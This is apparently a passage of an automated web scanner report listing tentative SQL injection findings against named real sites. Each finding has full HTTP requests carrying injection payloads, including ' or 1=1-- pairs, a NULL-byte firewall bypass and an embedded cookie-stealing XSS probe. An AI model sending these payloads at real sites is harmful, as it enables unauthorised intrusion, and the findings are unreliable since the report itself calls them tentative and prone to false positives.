GET /pagead/ads?client=ca-pub-3737471162188127&output=html&h=600%2527%2527&slotname=3414113612&w=160&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041995&frm=1&adk=1261819541&ga_vid=478840491.1295922042&ga_sid=1295922042&ga_hid=1179528252&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3522672927&fu=0&ifi=1&dtd=287 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?n=a2bb8a70&zoneid=121960&target=_blank&cb=416587824
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 03:03:34 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4869

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...

1.6. http://googleads.g.doubleclick.net/pagead/ads [output parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The output parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the output parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-3737471162188127&output=html%00'&h=600&slotname=3414113612&w=160&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041995&frm=1&adk=1261819541&ga_vid=478840491.1295922042&ga_sid=1295922042&ga_hid=1179528252&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3522672927&fu=0&ifi=1&dtd=287 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?n=a2bb8a70&zoneid=121960&target=_blank&cb=416587824
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 03:03:27 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 7952

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-3737471162188127&output=html%00''&h=600&slotname=3414113612&w=160&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041995&frm=1&adk=1261819541&ga_vid=478840491.1295922042&ga_sid=1295922042&ga_hid=1179528252&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3522672927&fu=0&ifi=1&dtd=287 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?n=a2bb8a70&zoneid=121960&target=_blank&cb=416587824
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 03:03:28 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4869

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...

1.7. http://hairmakeup.tweetmeme.com/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hairmakeup.tweetmeme.com
Path:   /

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 15809153'%20or%201%3d1--%20 and 15809153'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: hairmakeup.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)15809153'%20or%201%3d1--%20
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:05:02 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=72d3fdf7986a5f2dd94d024f91a05628; expires=Tue, 01-Feb-2011 15:05:02 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0073239803314209
X-Served-In: 0.05068302154541
X-Served-By: h03
Content-Length: 42135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=channel_hairmakeup&width=300&height=250&rand=9882624324">
   </iframe>
</div><!-- advert: channel_hairmakeup_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=channel_hairmakeup&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=channel_hairmakeup&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=7224643832" alt="*" width="1" height="1" /><div class="new item">

<h2 class="top">Top Tweeted Stories</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3834295568/flier-beats-tsa-video-recording-charge-in-court-boing-boing" title="Flier beats TSA video recording charge in court - Boing Boing">

Flier beats TSA video recording charge in court - Boing&hellip;
</a> -&nbsp;<span class="green">345&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835712317/brain-controlled-wheelchair-healthymagination" title="Brain Controlled Wheelchair : Healthymagination">

Brain Controlled Wheelchair : Healthymagination
</a> -&nbsp;<span class="green">35&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

<a href="http://tweetmeme.com/story/3834850527
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: hairmakeup.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)15809153'%20or%201%3d2--%20
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:05:19 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=07cb4d1801e9dcd82851395d478c0373; expires=Tue, 01-Feb-2011 15:05:19 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0065698623657227
X-Served-In: 0.042007923126221
X-Served-By: ded2059
Content-Length: 42145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...
<iframe width="300" height="250" frameborder="0" scrolling="no" src="http://ads.tweetmeme.com/serve.js?tag=channel_hairmakeup&width=300&height=250&rand=89513938187">
   </iframe>
</div><!-- advert: channel_hairmakeup_300x100 -->    <div class="item">
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=channel_hairmakeup&advertid=384&nurl=http://dadapp.com" target="_blank">
           <img src="http://tweetmeme.s3.amazonaws.com/ads/DAD-logo-animated.gif" alt="" class="left" style="margin: 3px 10px 0px 0px;" />
       </a>
       <a href="http://ads.tweetmeme.com/redirect?width=300&height=100&tag=channel_hairmakeup&advertid=384&nurl=http://dadapp.com" target="_blank">DAD&bull;app</a> <em>n.</em> Simple, rule-based
desktop app for
media organising & private sharing for your home & family network.</div>
   <img src="http://ads.tweetmeme.com/impression.jpg?id=384&rand=16601502518" alt="*" width="1" height="1" /><div class="new item">

<h2 class="top">Top Tweeted Stories</h2>

<ul>
<li >
<div class="number">1</div>
<div class="title">

<a href="http://tweetmeme.com/story/3834295568/flier-beats-tsa-video-recording-charge-in-court-boing-boing" title="Flier beats TSA video recording charge in court - Boing Boing">

Flier beats TSA video recording charge in court - Boing&hellip;
</a> -&nbsp;<span class="green">345&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">2</div>
<div class="title">

<a href="http://tweetmeme.com/story/3835712317/brain-controlled-wheelchair-healthymagination" title="Brain Controlled Wheelchair : Healthymagination">

Brain Controlled Wheelchair : Healthymagination
</a> -&nbsp;<span class="green">35&nbsp;Tweets</span>
</div>
</li>
<li >
<div class="number">3</div>
<div class="title">

<a href="http://tweetmeme.com/story/38348505
...[SNIP]...

1.8. http://kontentdesign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11239645%20or%201%3d1--%20 and 11239645%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?111239645%20or%201%3d1--%20=1 HTTP/1.1
Host: kontentdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 24 Jan 2011 22:39:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Length: 518
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /?111239645%20or%201%3d2--%20=1 HTTP/1.1
Host: kontentdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 352408000473833862436b9fb7dcdeb1=7f8f1170d789cbd763ae5c69a60d1034; path=/
Last-Modified: Mon, 24 Jan 2011 22:39:17 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr" >
<head>
<base href="http://kontentdesign.com/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="kontent, design, joomla, san francisco, ron severdia, brand workspace, iphone" />
<meta name="description" content="Specialists in Design, User Experience, Brand Workspace and Joomla." />
<meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
<title>Kontent Design :: Award Winning Creative</title>
<link href="/templates/kontent11/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link rel="stylesheet" href="/plugins/content/ronbox/ronbox.css" type="text/css" />
<link rel="stylesheet" href="/templates/kontent11/css/reset.css" type="text/css" />
<link rel="stylesheet" href="/templates/kontent11/css/layout.css" type="text/css" />
<link rel="stylesheet" href="/templates/kontent11/css/typography.css" type="text/css" />
<link rel="stylesheet" href="/templates/kontent11/css/menus.css" type="text/css" />
<link rel="stylesheet" href="/templates/kontent11/css/modules.css" type="text/
...[SNIP]...

1.9. http://kontentdesign.com/media/system/js/caption.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /media/system/js/caption.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 53092844'%20or%201%3d1--%20 and 53092844'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media53092844'%20or%201%3d1--%20/system/js/caption.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:01:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 563

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /media53092844' or 1=1-- /system/js/caption.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /media53092844'%20or%201%3d2--%20/system/js/caption.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:01:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 559

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /media53092844' or 1=2-- /system/js/caption.js was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.10. http://kontentdesign.com/media/system/js/caption.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /media/system/js/caption.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 35124081'%20or%201%3d1--%20 and 35124081'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media/system35124081'%20or%201%3d1--%20/js/caption.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:03:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 563

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /media/system35124081' or 1=1-- /js/caption.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /media/system35124081'%20or%201%3d2--%20/js/caption.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:03:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 559

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /media/system35124081' or 1=2-- /js/caption.js was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.11. http://kontentdesign.com/media/system/js/caption.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /media/system/js/caption.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 80142346'%20or%201%3d1--%20 and 80142346'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media/system/js80142346'%20or%201%3d1--%20/caption.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:05:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 563

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /media/system/js80142346' or 1=1-- /caption.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /media/system/js80142346'%20or%201%3d2--%20/caption.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:05:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 559

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /media/system/js80142346' or 1=2-- /caption.js was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.12. http://kontentdesign.com/media/system/js/caption.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /media/system/js/caption.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 16186106'%20or%201%3d1--%20 and 16186106'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media/system/js/caption.js16186106'%20or%201%3d1--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:07:24 GMT
